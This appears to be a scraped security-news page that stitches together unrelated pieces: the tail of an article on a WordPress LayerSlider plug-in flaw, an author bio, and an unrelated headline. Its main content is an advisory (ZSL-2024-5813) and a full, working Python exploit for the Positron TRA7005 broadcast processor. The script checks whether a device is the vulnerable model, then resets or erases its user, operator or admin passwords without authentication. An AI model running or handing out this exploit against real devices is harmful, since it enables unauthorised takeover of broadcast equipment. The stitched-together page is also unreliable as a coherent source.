Indeed, at least 43% of websites on the entire Internet use WordPress to power their sites, e-commerce applications, and communities. Further, the wealth of sensitive data such as user passwords and payment info often stored within their pages represents a significant opportunity for threat actors who seek to misuse it.

Making "the WordPress ecosystem more secure ... ultimately makes the entire web more secure," WordPress noted.

Wordfence advised that WordPress users with LayerSlider installed on sites verify immediately that they are updated to the latest, patched version of the plug-in to ensure it isn't vulnerable to exploit.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection

The Positron Broadcast Digital Signal Processor TRA7005 version 1.20 suffers from an authentication bypass through a direct and unauthorized access to the password management functionality. The vulnerability allows attackers to bypass Digest authentication by manipulating the password endpoint _Passwd.html and its payload data to set a user's password to arbitrary value or remove it entirely. This grants unauthorized access to protected areas (/user, /operator, /admin) of the application without requiring valid credentials, compromising the device's system security.

    #!/usr/bin/env python# -*- coding: utf-8 -*-### Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit### Vendor: Positron srl# Product web page: https://www.positron.it#                   https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/# Affected version: 1.20#                   TRA7K5_REV107#                   TRA7K5_REV106#                   TRA7K5_REV104#                   TRA7K5_REV102## Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to# guarantee an excellent quality-price ratio in compliance with current regulations and# intended for individual broadcasters or radio networks. All models in the TRA7000 series# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper# for both analogue and digital audio inputs, change-over emergency switching between any# input with adjustable thresholds and intervention times, both in the switching phase on# the secondary source and in the return phase to the primary source. Ethernet connection# with Web-Server (optional) for total control and management of the device. Advanced BYPASS# system between MPX input and outputs, active on operating and power supply anomalies and# can also be activated remotely.## Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication# bypass through a direct and unauthorized access to the password management functionality.# The vulnerability allows attackers to bypass Digest authentication by manipulating the# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary# value or remove it entirely. This grants unauthorized access to protected areas (/user,# /operator, /admin) of the application without requiring valid credentials, compromising# the device's system security.## Tested on: Positron Web Server### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2024-5813# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php### 22.03.2024##import requests,sysprint("""______________________________________┏┳┓•      ┏┓            ┓  ┏┓    ┓  •  ┃ ┓┏┓┓┏  ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫  ┣ ┓┏┏┓┃┏┓┓╋ ┻ ┗┛┗┗┫  ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻  ┗┛┛┗┣┛┗┗┛┗┗       ┛                       ┛                 for   Positron Digital Signal Processor             ZSL-2024-5813______________________________________""")if len(sys.argv) != 4:    print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")    sys.exit(1)ip = sys.argv[1]ut = sys.argv[2]wa = sys.argv[3]valid_ut = ['user', 'oper', 'admin']if ut.lower() not in valid_ut:    print("Invalid user type! Use 'user', 'oper', or 'admin'.")    sys.exit(1)url = f'http://{ip}/_Passwd.html'did = f'http://{ip}/_Device.html'try:    r = requests.get(did)    if r.status_code == 200 and 'TRA7K5' in r.text:        print("Vulnerable processor found!")    else:        print("Not Vulnerable or not applicable. Exploit exiting.")        sys.exit(1)except requests.exceptions.RequestException as e:    print(f"Error checking device: {e}")    sys.exit(1)headers = {    'Content-Type'   : 'application/x-www-form-urlencoded',    'Accept-Language': 'mk-MK,en;q=0.6',    'Accept-Encoding': 'gzip, deflate',    'User-Agent'     : 'R-Marina/11.9',    'Accept'         : '*/*'}payload = {}if wa.lower() == 'erase':    payload[f'PSW_{ut.capitalize()}'] = 'NONE'else:    payload_key = f'PSW_{ut.capitalize()}'    payload[payload_key] = wa    #print(payload)r = requests.post(url, headers=headers, data=payload)print(r.status_code)print(r.text)

Tag

#auth